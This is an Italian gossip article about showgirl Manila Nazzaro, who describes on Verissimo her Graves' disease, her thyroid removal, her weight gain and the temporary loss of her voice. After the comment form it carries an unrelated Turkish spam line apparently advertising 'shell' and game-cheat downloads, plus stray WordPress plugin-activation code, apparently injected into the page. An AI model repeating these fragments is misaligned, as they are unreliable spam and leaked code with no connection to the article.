Manila Nazzaro e la malattia: “Ero ingrassata di 20 chili, la gente mi chiedeva perché mi facessi fotografare”



“Ero ingrassata di venti chili, non mi riconoscevo. La gente mi chiedeva perché uscissi e mi facessi fotografare”. Questo il racconto di Manila Nazzaro a Verissimo su Canale5 nella puntata andata in onda sabato 17 ottobre. La showgirl ha raccontato a Silvia Toffanin alcuni problemi di salute che l’hanno decisamente condizionata.

 

 

“Ho scoperto di avere una malattia alla tiroide, il morbo di Basedow, che mi ha costretto all’asportazione della ghiandola – ha spiegato – in pratica ho perso una corda vocale e quindi nei primi mesi ero completamente afona e ho avuto paura di non poter tornare a fare il mio lavoro. Ma con testardaggine e grazie alla logopedia, con il tempo sono riuscita a riacquistare un’altra voce”. Tante difficoltà, di salute e nella vita privata, ma ora per fortuna ha trovato la serenità insieme a Lorenzo Amoruso, anche lui ex calciatore.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Shell İndir Oyun İndir Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );